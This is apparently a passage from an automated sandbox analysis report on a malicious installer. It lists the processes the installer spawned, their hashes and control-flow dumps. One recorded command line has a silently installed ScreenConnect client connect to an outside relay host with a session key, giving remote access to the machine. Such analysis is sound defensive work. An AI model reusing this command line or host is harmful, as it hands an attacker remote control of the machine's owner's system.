                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4B0EB90007EAA1AAA53FFC7F9A3C06A0 C
                                                                    Imagebase:0x650000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:13:51:20
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6349687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                    Imagebase:0xbb0000
                                                                    File size:61'440 bytes
                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:13:51:22
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 55E13C22DDD204F783E51197303A9E7C
                                                                    Imagebase:0x650000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:13:51:23
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 42A8F4A2C940B9BB8BF7F1D0A8DC547D E Global\MSI0000
                                                                    Imagebase:0x650000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:13:51:23
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=83bddc03-80e5-4274-9bbf-03906dc66e78&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c="
                                                                    Imagebase:0x8c0000
                                                                    File size:95'512 bytes
                                                                    MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:13:51:25
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "4e7e4252-7a52-43b7-b468-adf4aa363155" "User"
                                                                    Imagebase:0x520000
                                                                    File size:602'392 bytes
                                                                    MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2587568699.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:10
                                                                    Start time:13:51:27
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff68dea0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:11
                                                                    Start time:13:51:28
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "106fd89e-6d51-4cff-8c4a-637d8376f30e" "System"
                                                                    Imagebase:0xca0000
                                                                    File size:602'392 bytes
                                                                    MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:13.2%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:20%
                                                                      Total number of Nodes:25
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 27805 13118d8 27806 13118e8 27805->27806 27809 13119e0 27806->27809 27807 1311935 27810 13119fb 27809->27810 27813 13141f0 27809->27813 27818 13141e0 27809->27818 27810->27807 27814 131420f 27813->27814 27815 13143ed 27814->27815 27823 56114c0 27814->27823 27827 56114b0 27814->27827 27819 131420f 27818->27819 27820 13143ed 27819->27820 27821 56114c0 RtlGetVersion 27819->27821 27822 56114b0 RtlGetVersion 27819->27822 27821->27820 27822->27820 27824 56114ce 27823->27824 27825 56114d4 27823->27825 27831 5612d07 27824->27831 27825->27815 27828 56114c0 27827->27828 27829 56114d4 27828->27829 27830 5612d07 RtlGetVersion 27828->27830 27829->27815 27830->27829 27832 5612d1d 27831->27832 27833 5612e2c 27832->27833 27834 5612f20 RtlGetVersion 27832->27834 27833->27825 27835 5612fca 27834->27835 27835->27825

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 69 5612d07-5612de6 82 5612e58-5612e6d 69->82 83 5612de8-5612dfc 69->83 90 5612ead-5612ec8 82->90 91 5612e6f-5612e8b 82->91 86 5612e02 83->86 87 5612dfe-5612e00 83->87 88 5612e05-5612e26 call 5612560 86->88 87->88 98 5612ef8-5612fc8 RtlGetVersion 88->98 99 5612e2c-5612e57 88->99 97 5612eca-5612ece 90->97 103 5612e95-5612eab 91->103 104 5612e8d 91->104 101 5612ed0 97->101 102 5612ed9 97->102 112 5612fd1-5613014 98->112 113 5612fca-5612fd0 98->113 101->102 102->98 103->97 104->103 117 5613016 112->117 118 561301b-5613022 112->118 113->112 117->118
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363362963.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5610000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LRgq$`Qgq$`Qgq
                                                                      • API String ID: 0-3537268294
                                                                      • Opcode ID: 28517a515d5cb5ac99c3f57c2690e07d74f4c33d8f5b230fbedbc8b0183a2579
                                                                      • Instruction ID: 4e337633ef8d01ea2c888f46b3cf3e3c5f70525c41e3cd67ca4c2f9afa9d3df1
                                                                      • Opcode Fuzzy Hash: 28517a515d5cb5ac99c3f57c2690e07d74f4c33d8f5b230fbedbc8b0183a2579
                                                                      • Instruction Fuzzy Hash: DB812631B043658FEB11EB69D8247EE7BB1EF85310F0444AAC409DB391DB745D49CBA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 119 561ba50-561ba75 303 561ba77 call 561ba41 119->303 304 561ba77 call 561ba50 119->304 122 561ba7d-561baf2 call 561b338 * 2 call 561a9d8 134 561bbd4-561bbde 122->134 135 561baf8-561bafa 122->135 136 561bb00-561bb06 135->136 137 561bbdf-561bc3f 135->137 138 561bc46-561bcfc 136->138 139 561bb0c-561bb1e 136->139 137->138 168 561bd04-561bd0c 138->168 143 561bb90-561bbce call 561b7b4 139->143 144 561bb20-561bb88 139->144 143->134 143->135 144->143 169 561bdc0-561bdc9 168->169 170 561bdd4-561bddb 169->170 171 561bdcb-561bdce 169->171 173 561bde1-561be20 call 561b338 170->173 174 561bfbf-561bfc8 170->174 171->170 172 561bd11-561bd1d 171->172 175 561bd23-561bd3c 172->175 176 561bfc9-561c03d 172->176 195 561be22-561be27 173->195 196 561be29-561be36 173->196 180 561bdb3-561bdbd 175->180 181 561bd3e-561bdab 175->181 204 561c043-561c062 176->204 205 561c1dd-561c1e7 176->205 180->169 181->180 197 561be39-561be76 call 561a9d8 195->197 196->197 208 561bfb0-561bfb9 197->208 209 561c064-561c0c3 call 561b338 204->209 210 561c0cb-561c0da 204->210 208->174 211 561be7b-561beba 208->211 209->210 210->205 215 561c0e0-561c119 210->215 226 561bf31-561bf86 211->226 227 561bebc-561bf29 211->227 215->205 228 561c11f-561c122 215->228 226->208 241 561bf88-561bf8a 226->241 227->226 228->205 230 561c128-561c12b 228->230 232 561c149-561c15b 230->232 233 561c12d-561c131 230->233 242 561c1c8-561c1d7 232->242 243 561c15d-561c1c0 232->243 235 561c133-561c137 233->235 236 561c13f-561c143 233->236 235->236 236->232 238 561c1e8-561c23d 236->238 260 561c245-561c250 238->260 261 561c23f 238->261 241->208 244 561bf8c-561bfab 241->244 242->205 242->215 243->242 244->174 256 561bfad 244->256 256->208 262 561c252-561c259 260->262 263 561c25a-561c25c 260->263 261->260 262->263 264 561c2b2-561c31f 263->264 265 561c25e-561c261 263->265 271 561c326-561c34d 264->271 265->264 266 561c263-561c269 265->266 268 561c278-561c27e 266->268 269 561c26b-561c270 266->269 270 561c284-561c294 268->270 268->271 269->268 278 561c296-561c29c 270->278 279 561c2ac-561c2b1 270->279 275 561c355-561c360 271->275 276 561c34f 271->276 282 561c362-561c369 275->282 283 561c36a-561c36c 275->283 276->275 280 561c2a0-561c2a2 278->280 281 561c29e 278->281 280->279 281->279 282->283 285 561c3a9-561c3f1 283->285 286 561c36e-561c371 283->286 293 561c3f8-561c412 285->293 286->285 287 561c373-561c379 286->287 290 561c388-561c38e 287->290 291 561c37b-561c380 287->291 292 561c390-561c3a6 290->292 290->293 291->290 303->122 304->122
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363362963.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5610000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'gq$4'gq$4'gq$4'gq$4'gq
                                                                      • API String ID: 0-2537315780
                                                                      • Opcode ID: 102cd659275b35df2e07ad93ac4ed89ae2200c79eb6a2393e0a944a3923b9700
                                                                      • Instruction ID: 0180e2097c4602c89f202575915c60b505608e27df463688170ece253e67a69b
                                                                      • Opcode Fuzzy Hash: 102cd659275b35df2e07ad93ac4ed89ae2200c79eb6a2393e0a944a3923b9700
                                                                      • Instruction Fuzzy Hash: BC62C170A006159FCB14DF69C880AAEBBF2FF88310B14856DE816DB7A1DB34ED45CB94

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 558 56187d8-5618823 call 5613690 705 5618825 call 5619450 558->705 706 5618825 call 5614e40 558->706 707 5618825 call 56187c8 558->707 708 5618825 call 56187d8 558->708 562 561882b-561888d call 561a0f0 712 561888f call 561f475 562->712 713 561888f call 561f55e 562->713 568 5618895-56188ff 699 5618901 call 5632c81 568->699 700 5618901 call 5632c90 568->700 574 5618907-561894b 709 561894d call 5632c81 574->709 710 561894d call 5632c90 574->710 578 5618953-56189f4 585 5619445-56194e5 call 5614e40 call 5619b58 578->585 586 56189fa-5618a2f 578->586 605 56194eb-5619534 585->605 586->585 589 5618a35-5618a6a 586->589 589->585 592 5618a70-5618aa5 589->592 592->585 596 5618aab-5618ae0 592->596 596->585 600 5618ae6-5618b1b 596->600 600->585 604 5618b21-5618b3c 600->604 607 5618b42-5618b6e 604->607 608 5618bcb-5618bde 604->608 615 5618b70-5618bb4 607->615 616 5618bbc-5618bc5 607->616 610 5618be0-5618bf5 608->610 611 5618bf7-5618c06 608->611 612 5618c0c-5618c12 610->612 611->612 703 5618c14 call 56349e0 612->703 704 5618c14 call 5634988 612->704 615->616 616->607 616->608 617 5618c1a-5618c33 619 5618c35-5618cac 617->619 620 5618cae-5618ccb 617->620 619->620 625 5618ccd-5618ce2 619->625 622 5618ce8-5619033 620->622 671 5619039-56191b1 622->671 672 56191cd-56191e9 622->672 625->622 701 56191b3 call 5634c81 671->701 702 56191b3 call 5634c90 671->702 675 56191f7-56191f8 672->675 676 56191eb 672->676 675->585 676->675 697 56191b9-56191c7 697->671 697->672 699->574 700->574 701->697 702->697 703->617 704->617 705->562 706->562 707->562 708->562 709->578 710->578 712->568 713->568
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363362963.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5610000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 8794c6a3ae3b3209e1b793594fea8d08e066e7a9002372c1331bed06897f8b90
                                                                      • Instruction ID: cc5ccbce26dc8c060dfa171c59312b6bc8331e404bdb0b01d9290647031549b0
                                                                      • Opcode Fuzzy Hash: 8794c6a3ae3b3209e1b793594fea8d08e066e7a9002372c1331bed06897f8b90
                                                                      • Instruction Fuzzy Hash: 6B626B74A10228CFDB15DF65D844BAEBBB2FF89300F108599E909AB354DB74AD85CF90

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 715 56187c8-5618823 call 5613690 859 5618825 call 5619450 715->859 860 5618825 call 5614e40 715->860 861 5618825 call 56187c8 715->861 862 5618825 call 56187d8 715->862 720 561882b-561888d call 561a0f0 866 561888f call 561f475 720->866 867 561888f call 561f55e 720->867 726 5618895-56188ff 869 5618901 call 5632c81 726->869 870 5618901 call 5632c90 726->870 732 5618907-561894b 863 561894d call 5632c81 732->863 864 561894d call 5632c90 732->864 736 5618953-56189f4 743 5619445-56194e5 call 5614e40 call 5619b58 736->743 744 56189fa-5618a2f 736->744 763 56194eb-5619534 743->763 744->743 747 5618a35-5618a6a 744->747 747->743 750 5618a70-5618aa5 747->750 750->743 754 5618aab-5618ae0 750->754 754->743 758 5618ae6-5618b1b 754->758 758->743 762 5618b21-5618b3c 758->762 765 5618b42-5618b6e 762->765 766 5618bcb-5618bde 762->766 773 5618b70-5618bb4 765->773 774 5618bbc-5618bc5 765->774 768 5618be0-5618bf5 766->768 769 5618bf7-5618c06 766->769 770 5618c0c-5618c12 768->770 769->770 857 5618c14 call 56349e0 770->857 858 5618c14 call 5634988 770->858 773->774 774->765 774->766 775 5618c1a-5618c33 777 5618c35-5618cac 775->777 778 5618cae-5618ccb 775->778 777->778 783 5618ccd-5618ce2 777->783 780 5618ce8-5619033 778->780 829 5619039-56191b1 780->829 830 56191cd-56191e9 780->830 783->780 871 56191b3 call 5634c81 829->871 872 56191b3 call 5634c90 829->872 833 56191f7-56191f8 830->833 834 56191eb 830->834 833->743 834->833 855 56191b9-56191c7 855->829 855->830 857->775 858->775 859->720 860->720 861->720 862->720 863->736 864->736 866->726 867->726 869->732 870->732 871->855 872->855
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363362963.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5610000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 34b6ab4f9728604ffb4fc90fbcdd9276cc5ae63a27f9948c5c017db858caffc6
                                                                      • Instruction ID: afb9e683be261d3a837902e004cd48a86ea3e44d11f53e6b12327c1ce8ea0a3e
                                                                      • Opcode Fuzzy Hash: 34b6ab4f9728604ffb4fc90fbcdd9276cc5ae63a27f9948c5c017db858caffc6
                                                                      • Instruction Fuzzy Hash: FE426A34A10228CFDB15DF25D844BAEBBB2FB89300F148599E909AB354DB75AD85CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363595595.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5630000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b3666659e202a1ac8eae9368476aab2ee337620067e0e3d3930bbc93f9e77fc3
                                                                      • Instruction ID: 6cd9813eff92b85ac07220369f39948b43039a983c5ec9566b9541bb11666044
                                                                      • Opcode Fuzzy Hash: b3666659e202a1ac8eae9368476aab2ee337620067e0e3d3930bbc93f9e77fc3
                                                                      • Instruction Fuzzy Hash: 7CB21974A002049FDB14DF68C889AADBBF2FF89310F158159E95AAB365DB30AC85CF54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 5630848-5630872 2 5630891-563089d 0->2 3 5630874-563088e 0->3 6 56308c0-56308cc 2->6 7 563089f-56308bd 2->7 11 56308d2-56308d7 6->11 12 56309d5-56309e1 6->12 14 56308f5 11->14 15 56308d9-56308df 11->15 20 56309e3-56309e9 12->20 21 5630a21-5630a40 12->21 19 56308f7-563090f 14->19 17 56308e1-56308e3 15->17 18 56308e5-56308f1 15->18 22 56308f3 17->22 18->22 27 5630915-563091e 19->27 28 56309bf-56309d2 19->28 24 56309f7-5630a1e 20->24 25 56309eb-56309ed 20->25 40 5630a42-5630a6c 21->40 41 5630a89-5630a8e call 5630ac8 21->41 22->19 25->24 34 5630920-5630926 27->34 35 563093c 27->35 37 5630928-563092a 34->37 38 563092c-5630938 34->38 39 563093e-5630960 35->39 42 563093a 37->42 38->42 67 5630962 call 5630848 39->67 68 5630962 call 5630838 39->68 50 5630a74-5630a87 40->50 51 5630a6e 40->51 46 5630a94-5630a98 41->46 42->39 49 5630968-5630979 65 563097b call 5630848 49->65 66 563097b call 5630838 49->66 50->41 52 5630a70-5630a72 51->52 53 5630a99-5630ab4 51->53 52->50 52->53 57 5630981-563099a 59 56309b4-56309b8 57->59 60 563099c-56309a2 57->60 59->28 61 56309a6-56309b2 60->61 62 56309a4 60->62 61->59 62->59 65->57 66->57 67->49 68->49
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363595595.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5630000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $gq$$gq$$gq$$gq$$gq$$gq$$gq
                                                                      • API String ID: 0-4020190305
                                                                      • Opcode ID: 57f16adc8ca578a31f159307567e328391083a483501fc13307b8d6ae14518cb
                                                                      • Instruction ID: 02e39f4963e78b565d711e4f0769de3e8f8ae8e38c6c75ccd8e507060de67e81
                                                                      • Opcode Fuzzy Hash: 57f16adc8ca578a31f159307567e328391083a483501fc13307b8d6ae14518cb
                                                                      • Instruction Fuzzy Hash: 3B711371B002198FDB25DF79E85567EBBB7FFC8620B20802AD5569B784DF319841CB90

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 305 1317a30-1317a7f 310 1317a81-1317a95 305->310 311 1317abd-1317ad5 305->311 314 1317a97 310->314 315 1317a9e-1317abb 310->315 316 1317b13-1317b2b 311->316 317 1317ad7-1317aeb 311->317 314->315 315->311 321 1317b69-1317b8e 316->321 322 1317b2d-1317b41 316->322 323 1317af4-1317b11 317->323 324 1317aed 317->324 334 1317b90-1317ba4 321->334 335 1317bcc-1317c05 321->335 329 1317b43 322->329 330 1317b4a-1317b67 322->330 323->316 324->323 329->330 330->321 339 1317ba6 334->339 340 1317bad-1317bca 334->340 346 1317c43-1317c7c 335->346 347 1317c07-1317c1b 335->347 339->340 340->335 357 1317cba-1317cc9 346->357 358 1317c7e-1317c92 346->358 350 1317c24-1317c41 347->350 351 1317c1d 347->351 350->346 351->350 361 1317c94 358->361 362 1317c9b-1317cb8 358->362 361->362 362->357
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1336976614.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1310000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #!$K6$7
                                                                      • API String ID: 0-185628103
                                                                      • Opcode ID: 33c545981e7848dce5a2f9918c5ff820929cfbef4abca803bfa96410db9c4d13
                                                                      • Instruction ID: 7d92db349fa3ee955b56317e064b3959ca9826f25632405076f465fa84f6cf7d
                                                                      • Opcode Fuzzy Hash: 33c545981e7848dce5a2f9918c5ff820929cfbef4abca803bfa96410db9c4d13
                                                                      • Instruction Fuzzy Hash: 0E5193747107125BC709B77ED89062E7BE7EBCC360754862AE01ACB388EF749D498B91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 365 5632c90-5632cf8 369 5632d61-5632d67 365->369 370 5632cfa 365->370 448 5632d6a call 5632c81 369->448 449 5632d6a call 5632c90 369->449 371 5632cfd-5632d03 370->371 372 5632d89-5632de8 371->372 373 5632d09-5632d13 371->373 386 5632e1a-5632e1f call 561ff80 372->386 387 5632dea-5632df9 372->387 373->372 375 5632d15-5632d1c call 5630848 373->375 374 5632d70-5632d86 call 5632820 380 5632d21-5632d5f 375->380 380->369 380->371 389 5632e25-5632e47 386->389 390 5632ed6-5632ee0 387->390 391 5632dff-5632e0a 387->391 395 5632ec9-5632ed3 389->395 396 5632e4d 389->396 397 5632ee3-5632eff 390->397 398 5632ee2 390->398 391->390 392 5632e10-5632e18 391->392 392->386 392->387 399 5632e50-5632e66 396->399 400 5632fb0-5632fd5 397->400 401 5632f05-5632f07 397->401 398->397 408 5632e68-5632e6d 399->408 409 5632e6f 399->409 404 5632fdc-5632fe0 400->404 403 5632f0d-5632f11 401->403 401->404 403->404 410 5632f17-5632f1f 403->410 406 5632fe2-5632fe8 404->406 407 5632fea 404->407 414 5632ff0-563301c 406->414 407->414 411 5632e74-5632e7a 408->411 409->411 412 5633023-563307b 410->412 413 5632f25-5632f27 410->413 415 5632eb2-5632ec7 411->415 416 5632e7c 411->416 446 5633083 412->446 447 563307d 412->447 417 5632f37-5632f3b 413->417 418 5632f29-5632f31 413->418 414->412 415->395 415->399 421 5632e7f-5632e85 416->421 422 5632fa9-5632fad 417->422 423 5632f3d-5632f41 417->423 418->412 418->417 421->390 425 5632e87-5632eb0 421->425 426 5632f43-5632f57 423->426 427 5632f59-5632f6d 423->427 425->415 425->421 426->427 435 5632f76-5632f78 426->435 427->435 436 5632f6f-5632f73 427->436 438 5632f91-5632fa1 435->438 439 5632f7a-5632f8e 435->439 450 5632fa3 call 5633189 438->450 451 5632fa3 call 5633198 438->451 447->446 448->374 449->374 450->422 451->422
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363595595.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5630000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (kq$Hkq
                                                                      • API String ID: 0-2388542449
                                                                      • Opcode ID: 61b1ee727403db23228ad86743119875639f9dfb82bf253758411579f782c242
                                                                      • Instruction ID: d2b02efe61c45ff41f1bd6ad0b89b25b4cc4fe5299d70e5aaaf8c5d7bd36bef4
                                                                      • Opcode Fuzzy Hash: 61b1ee727403db23228ad86743119875639f9dfb82bf253758411579f782c242
                                                                      • Instruction Fuzzy Hash: 21C17D75B001199FCB14DFA9C995AAEBBB6FF88310F148029E819E7354DB34ED45CBA0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 453 131d531-131d538 454 131d588-131d58c 453->454 455 131d53a-131d558 453->455 458 131d5b1-131d5c5 454->458 459 131d58e-131d596 454->459 456 131d635-131d65a 455->456 457 131d55e-131d560 455->457 460 131d661-131d665 456->460 457->460 461 131d566-131d56a 457->461 471 131d5d1-131d5e2 458->471 472 131d5c7-131d5ce 458->472 462 131d5a4 459->462 463 131d598-131d59a 459->463 464 131d667-131d66d 460->464 465 131d66f 460->465 461->460 468 131d570-131d578 461->468 501 131d5a6 call 131d531 462->501 502 131d5a6 call 131d6f0 462->502 503 131d5a6 call 131d6e0 462->503 504 131d5a6 call 131d505 462->504 463->462 469 131d675-131d6a1 464->469 465->469 477 131d6a8-131d6f4 468->477 478 131d57e-131d582 468->478 469->477 470 131d5ac-131d5af 470->458 470->471 474 131d5f2 471->474 475 131d5e4-131d5f0 471->475 479 131d5f4-131d603 474->479 475->479 498 131d6fc-131d701 477->498 478->454 481 131d62b-131d632 478->481 488 131d613 479->488 489 131d605-131d611 479->489 481->477 491 131d616-131d628 488->491 489->491 499 131d629 call 131dad8 491->499 500 131d629 call 131dac8 491->500 499->481 500->481 501->470 502->470 503->470 504->470
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1336976614.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1310000_estatement020134230003.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (kq$Hkq
                                                                      • API String ID: 0-2388542449
                                                                      • Opcode ID: f9d8349995312b61809c61a98c6f2c83011918315f7bc9b5ef4e89c5c96f9a88
                                                                      • Instruction ID: 9c46f613a327ffc33e00b4ca80c7ba32a5bbce104a02ba9c86bb5b66b1237b24
                                                                      • Opcode Fuzzy Hash: f9d8349995312b61809c61a98c6f2c83011918315f7bc9b5ef4e89c5c96f9a88
                                                                      • Instruction Fuzzy Hash: 333104317002599BCF18EEAD84487AE3BA6EBC5368F544929D909CB388DF38DD0487E1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 505 5634c90-5634c9b 506 5634cc8-5634cf3 505->506 507 5634c9d-5634ca0 505->507 509 5634cfa-5634d25 506->509 508 5634ca2-5634caa 507->508 507->509 510 5634cb0-5634cc7 508->510 511 5634d2c-5634dac call 56351da 508->511 509->511 537 5634dae call 5636450 511->537 538 5634dae call 5636400 511->538 539 5634dae call 563645f 511->539 532 5634db4-5634dc2 call 5632820 535 5634dc7-5634dcb 532->535 537->532 538->532 539->532
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1363595595.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
